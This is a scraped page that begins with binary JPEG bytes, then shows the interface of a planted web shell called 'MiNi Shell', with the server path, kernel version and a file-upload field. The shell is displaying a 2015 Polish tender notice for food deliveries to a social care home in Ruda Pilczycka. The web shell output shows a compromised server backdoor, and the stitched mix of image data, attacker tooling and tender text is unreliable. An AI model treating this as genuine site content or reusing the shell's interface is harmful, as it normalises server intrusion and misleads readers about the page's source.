JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151126/320252-N-2015.html

<p class="kh_header"><b>Ruda Pilczycka: Dostawa art. żywnościowych do Domu Pomocy Społecznej Etola w Rudzie Pilczyckiej (7 części zamówienia)</b><br>
<b>Numer ogłoszenia: 320252 - 2015; data zamieszczenia: 26.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , 57, 26-234 Ruda Pilczycka, woj. świętokrzyskie, tel. 0-41 3912112, faks 0-41 3912100.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa art. żywnościowych do Domu Pomocy Społecznej Etola w Rudzie Pilczyckiej (7 części zamówienia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa artykułów żywnościowych do Domu Pomocy Społecznej Etola w Rudzie Pilczyckiej zgodnie z opisem  zawartym w rozdziale IV (części zamówienia).Części zamówienia Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę  na jedną lub wszystkie grupy. Oferta częściowa musi obejmować wszystkie pozycje określone w danej grupie. Oferta częściowa musi obejmować co najmniej jedną z poniższych grup.Grupa I. Pieczywo.Grupa II. Przetwory sypkie, przyprawy, produkty strączkowe, przetwory, napoje.Grupa  III. Drób i przetwory drobiowe.Grupa  IV. Nabiał i przetwory nabiałowe.Grupa  V. Mięso wieprzowe , wędliny i wyroby podrobowe.Grupa VI.  Art. spożywcze mrożone , ryby wędzone i solone.Grupa VII . Jaja. 1.Dostawa art. żywnościowych 1.1Przedmiotem zamówienia jest zakup i dostawa artykułów żywnościowych zgodnie  z wykazem   zamieszczonym w grupach I-VII. 1.2Wykonawca winien dokładnie zapoznać się ze wszystkimi zapisami SIWZ. 1.3Treść oferty musi odpowiadać treści SIWZ i być zgodna z powszechnie obowiązującymi przepisami prawa. Jeśli w opisie zamówienia - formularz ofertowy- Zamawiający wskazał konkretny znak towarowy produktu, to Wykonawca ma możliwość zaoferowanie produktu równoważnego i powinien podać nazwę oferowanego produktu równoważnego. Brak takiego zapisu spowoduje uznanie, że Wykonawca oferuje produkt wskazany przez Zamawiającego.1.4Wykonawca który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy- produkty- spełniają wymagania określone przez Zamawiającego-(art. 30 ust. 5 ustawy PZP). 1.5	Wymogi dodatkowe:- artykuły będące przedmiotem zamówienia powinny być pierwszej jakości, posiadać wymagane atesty i terminy ważności, być odpowiednio opakowane i transportowane w warunkach spełniających wszystkie wymogi sanitarne,-dostawa na koszt i ryzyko transportem Wykonawcy do magazynu Zamawiającego,- dostawy częściowe, sukcesywne, uruchamiane telefonicznie,-zmiana cen w trakcie realizacji umowy może nastąpić tylko na skutek okoliczności których nie można było  przewidzieć w chwili jej zawarcia, 1.6 Ilości podane w grupach I- VII są szacunkowe i mogą ulec zmianie (zmniejszeniu lub zwiększeniu nie więcej niż o 20%). Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego. Grupa I Pieczywo Lp. Nazwa artykułu	Jednostka miary	Roczna ilość 1.Chleb żytni krojony  1 kg	szt.	6 000 2. Chleb razowy krojony 1 kg szt. 6 500
3.Bułka wrocławska 100 g	szt.	26 000 4.Bułka razowa   100 g	szt.	2 200
5.Bułka pełnoziarnista   100 g szt. 2 600 Grupa II  Przetwory sypkie,przyprawy, produkty strączkowe, przetwory, napoje Lp.	Nazwa artykułu	Jednostka miary Roczna ilość 1.	Ananas plastry  565 g	szt.	150 2. Aromaty do ciast    10 g szt. 105 3.	Barszcz czerwony (koncentrat)   320 ml szt. 60 4. Bazylia 10 g szt. 45 5.	Brzoskwinie w syropie    820 g	szt.	55 6.	Budyń różne smaki Winiary    60-64 g	szt.	1 250 7.Bułka tarta 1  kg	kg 115 8.	Chrzan tarty  290 g szt. 350  9.Ciastka biszkopty Wrocławskie Mamut  120 g szt. 70 10. Cukier kryształ  1 kg	kg 2 400 11. Cukier waniliowy  32 g	szt.	170 12. Cynamon 20 g szt.	50
13. Drożdże świeże 100 g	szt.	60 14. Dżem owocowy (różne smaki) Pińczów  280 g szt.	600 15. Dżem bezcukrowy (różne smaki)  Stovit    220 g szt.	50
16. Fasola czerwona konserwowa  400 g szt.	100 17.Fasola Jaś  1 kg kg	160 18. Filety śledziowe w oleju  170 g szt.	550 19. Filety śledziowe w pomidorach   170 g szt. 280 20.Galaretka owocowa  Delecta   75 g szt.	650
21.Gałka muszkatołowa 15 g szt. 25 22. Groch łuskany 1 kg	kg	140 23. Groszek konserwowy 400 g	szt.	500 24. Herbata  1 kg	 kg	85 25.		Herbata owocowa Saga (op. 25 torebek)	op.	40 26. Imbir mielony  20 g	szt.	25 27. Kakao   200 g	szt.	50 28. Kasza gryczana    1 kg	kg	130 29. Kasza jęczmienna  1 kg	kg	250 30.Kasza kukurydziana  1 kg	 kg	70 31. Kasza manna 1 kg	kg	90 32. Kaszka mleczno -ryżowa truskawkowa Nestle  230g 	szt.	10 33. Kawa zbożowa  500 g	szt.	60
34.	Ketchup łagodny   500 g	szt.	250 35. Kisiel różne smaki Winiary 77 g szt.	1 200 36.Kminek  20 g szt.	65 37. Koncentrat pomidorowy 30%  Pińczów  950 g szt.	200 38. Konserwa mięsna  Przysmak Śniadaniowy 300 g szt.	700
39.Koperek suszony  10 g	szt.	180 40. Kostki rosołowe drobiowe  Winiary  60 g	szt.	200 41. Kostki rosołowe wołowe Winiary 60 g szt.	200
42.	Krem do smarowania pieczywa o smaku czekoladowym 200 g szt.	100 43. Krem do smarowania pieczywa o smaku orzechowym   200 g	szt.	100
44.Kukurydza konserwowa 400 g	szt.	250 45. Kwasek cytrynowy  20 g	szt. 150 46. Liść laurowy  7 g	szt.	120 47. Majeranek   8 g	szt.	120
48. Majonez Kielecki  500 g	szt.	500 49. Makaron nitki Lubella  2 kg kg	500
50.Makaron łazanki  2 kg	kg	150 51. Makaron muszelki  2 kg	kg	150
52. Makaron spaghetti Lubella 1 kg kg	120 53. Makaron świderki 2 kg	kg	610  54. Margaryna śniadaniowa Bielmar  500 g	kg 710
55. Margaryna zwykła  250 g kg	165 56. Marmolada Duchnice   850 g	szt.	120 57. Marynata klasyczna Prymat  20 g	szt.	100 58. Marynata staropolska  Kamis  20 g	szt.	120 59. Masło roślinne  kubek Kruszwica   250 g kg	250 60. Mąka pszenna typ 500 1 kg kg 450 61. Mąka ziemniaczana 1 kg	kg	20 62. Mąka żytnia typ 500   1 kg kg	150 63. Miód pszczeli  wielokwiatowy  370 g	szt.	120 64. Mlekołaki kulki, kółka kakaowe  250 g	szt.	10 65. Morele suszone  150 g	szt.	10 66. Musztarda   stołowa    190 g szt.	450 67. Ocet   0,5 l	szt. 20 68.	 Ogórki konserwowe  850 g	szt.	240 69. Olej uniwersalny  3 l  l 450 70. Oregano   10 g	Szt.	35 71.	Papryka konserwowa 780 g	szt.	60 72. Papryka ostra  20 g	szt.	85
73. Papryka słodka  20 g	szt.	140 74.Pasztet drobiowy  Podlaski 155 g   szt.	850 75. Pasztet Mazowiecki       460 g	szt.	350
76.		Pieczarki marynowane                                       770 g	szt.	100
77.		Pieprz naturalny mielony                                     20 g	szt.	600
78.		Pieprz ziołowy                                                        20 g	szt.	550
79.		Pietruszka suszona                                                10 g                                   	szt.	90
80.		Płatki jęczmienne                                                  1 kg	kg	80
81.		Płatki kukurydziane                                               1 kg	kg	40
82.		Płatki owsiane                                                        1 kg	kg	60
83.		Pomidory obierane                                             400 g	szt.	400
84.		Powidła węgierkowe                                          280 g	szt.	160
85.		Proszek do pieczenia                                            30 g	szt.	60
86.		Przyprawa do drobiu Cykoria                              40 g	szt.	135
87.		Przyprawa do ryb Cykoria                                    40 g	szt.	80
88.		Przyprawa do ziemniaków  Cykoria                   30 g	szt.	50
89.		Przyprawa  Warzywko                                          1 kg	kg	60
90.		Przyprawa w płynie  Maggi                                     1 l	l	130
91.		Rodzynki                                                               100 g	szt.	100
92.		Ryż długoziarnisty biały                                       1 kg	kg	550
93.		Sałatka rybna                                                        150g	szt.	800
94.		Sok pomidorowy  Hortex                                       1 l	szt.	20
95.		Słodzik                                                     op. 1000 szt.	op.	5
96.		Sól jodowana                                                          1 kg	kg	500
97.		Suchary delikatesowe Mamut                          285 g 	szt.	10
98.		Syrop owocowy Łowicz różne smaki              440ml	szt.	200
99.		Szczaw konserwowy                                           285 g	szt.	60
100.		Szprot w oleju                                                      170 g	szt.	250
101.		Szprot w pomidorach                                         170 g	szt.	250
102.		Szynka konserwowa mielona  Werbliński       110 g	szt.	1 250
103.		Śliwki suszone bez pestki                                   150 g	szt.	70
104.		Tuńczyk w oleju                                                   170 g	szt.	700
105.		Wiórki kokosowe                                                 100 g	szt.	30
106.		Woda mineralna gazowana                                 1,5 l	szt.	900
107.		Woda mineralna niegazowana                           1,5 l	szt.	100
108.		Zacierki                                                                    1 kg	kg	150
109.		Ziele angielskie                                                       15 g	szt.	130
110.		Zioła prowansalskie                                              10 g	szt.	50
111.		Zupa grzybowa Winiary                                        48 g	szt.	400
112.		Zupa pieczarkowa Winiary                                   45 g	szt.	450
113.		Zupa ogonowa Winiary                                        41 g	szt.	150
114.		Żelatyna spożywcza                                              40 g 	szt.	100
115.		Soda oczyszczona                                                100 g	szt.	5

Grupa III  Drób i przetwory drobiowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	750
2.		Korpusy z kurczaka	kg	550
3.		Filet z kurczaka	kg	700
4.		Ćwiartki  z kurczaka	kg	800
5.		Wątróbka drobiowa	kg	200
6.		Żołądki z kurczaka	kg	150
7.		Mięso drobiowe gulaszowe II	kg	350




Grupa IV       Nabiał i przetwory nabiałowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	800
2.		Twaróg  półtłusty 	kg	500
3.		Masło extra   82% tłuszczu                       200 g                           	kg	250
4.		Ser żółty  Gouda	kg	250
5.		Jogurt owocowy                                         150 g	szt.	4 500
6.		Jogurt naturalny                                         450 g	szt.	1 500
7.		Serek topiony   krem. op.                          100 g	szt.	1 800
8.		Serki homogenizowane waniliowe          100 g	szt.	800
9.		Kefir  kubek                                                  450 g	szt.	2 000
10.		Śmietana  24 %  kubek                            400 ml	szt.	1 000
11.		Śmietana 12%  karton       poj.               500 ml	szt.	350

Grupa V         Mięso wieprzowe , wędliny  i wyroby podrobowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	300
2.		Boczek surowy wieprzowy bez skóry 	kg	250
3.		Schab  wieprzowy bez kości 	kg	250
4.		Szynka wieprzowa bez kości i bez skóry	kg	350
5.		Łopatka wieprzowa bez kości i bez skóry	kg	400
6.		Słonina wieprzowa bez skóry	kg	150
7.		Podroby wieprzowe bez wątroby	kg	180
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	250
10.		Mięso wieprzowe II 	kg	550
11.		Karczek wieprzowy bez kości	kg	120
12.		Kiełbasa szynkowa wieprzowa	kg	140
13.		Kiełbasa  mielonka tyrolska	kg	250
14.		Mortadela bez dodatków	kg	310
15.		Kiełbasa cienka zwyczajna wędzona	kg	800
16.		Parówki  wieprzowe	kg	300
17.		Parówki drobiowe	kg	200
18.		Kiełbasa  krakowska parzona	kg	200
19.		Kiełbasa biała żurkowa	kg	350
20.		Szynka wędzona	kg	15
21.		Ogonówka wieprzowa wędzona 	kg	25
22.		Boczek wędzony	kg	150
23.		Pasztet pieczony wieprzowy	kg	150
24.		Salceson  włoski	kg	220
25.		Salceson  czarny	kg	50
26.		Pasztetowa wieprzowa	kg	180
27.		Kaszanka jęczmienna	kg	250
28.		Kiełbasa szynkowa drobiowa	kg	120


Grupa VI        Art. spożywcze mrożone, ryby wędzone i solone
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	szt.	1 050
2.		Mieszanka kompotowa mrożona                          	kg	500
3.		Mieszanka warzywna mrożona 	kg	400
4.		Filet mrożony z miruny	kg	650
5.		Filety śledziowe bez skóry solone	kg	60
6.		Makrela wędzona bez głowy	kg	30

Grupa VII         Jaja
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	szt.	22 000
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:

Grupa I. Pieczywo - codziennie oprócz niedziel i dni świątecznych - w godz. 600-630
 Grupa II. Przetwory sypkie,  przyprawy, produkty strączkowe, przetwory, napoje -              1 raz w  tygodniu - w godz. 800 -1400 ( od poniedziałku do czwartku)
Grupa III. Drób i przetwory drobiowe - 4 razy w miesiącu - w godz. 800 -1400 (oprócz piątku)
Grupa IV. Nabiał i przetwory nabiałowe - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątku)
Grupa V. Mięso wieprzowe , wędliny i wyroby podrobowe- 3 razy w tygodniu - w godz. 800 -1400
Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątku)
Grupa VII. Jaja - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątku).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP (wg wzoru stanowiącego załącznik nr 1A do formularza ofertowego);2)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, że w zakładzie wykonawcy został wdrożony lub jest wdrażany system analizy zagrożeń HACCP - zgodnie z ustawą                z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 ze zm.)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Etola , Ruda Pilczycka 57 , 26-234 Słupia, Dział Administracyjno-Gospodarczy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej Etola, Ruda Pilczycka 57 , 26-234 Słupia, Dział Finansowo - Księgowy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia 1.1.Od  02 stycznia 2016 do 31 grudnia 2016. 1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej: Grupa I. Pieczywo - codziennie oprócz niedziel i dni świątecznych - w godz. 6.00-6.30 Grupa II. Przetwory sypkie,  przyprawy, produkty strączkowe, przetwory, napoje -  1 raz w  tygodniu - w godz. 8.00 -14.00 ( od poniedziałku do czwartku) Grupa III. Drób i przetwory drobiowe - 4 razy w miesiącu - w godz. 8.00 -14.00 (oprócz piątku) Grupa IV. Nabiał i przetwory nabiałowe - 1 raz w tygodniu - w godz. 8.00 -14.00 (oprócz piątku)
Grupa V. Mięso wieprzowe , wędliny i wyroby podrobowe- 3 razy w tygodniu - w godz. 8.00 -14.00 Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone - 1 raz w tygodniu - w godz. 8.00 -14.00 (oprócz piątku) Grupa VII. Jaja - 1 raz w tygodniu - w godz. 8.00 -14.00 (oprócz piątku).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I    Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa I    Pieczywo
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb żytni krojony                                       1 kg	szt.	6 000
2.		Chleb razowy krojony                                   1 kg	szt.	6 500
3.		Bułka wrocławska                                       100 g	szt.	26 000
4.		Bułka razowa                                               100 g	szt.	2 200
5.		Bułka pełnoziarnista                                   100 g	szt.	2 600
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:

Grupa I. Pieczywo - codziennie oprócz niedziel i dni świątecznych - w godz. 6.00-6.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
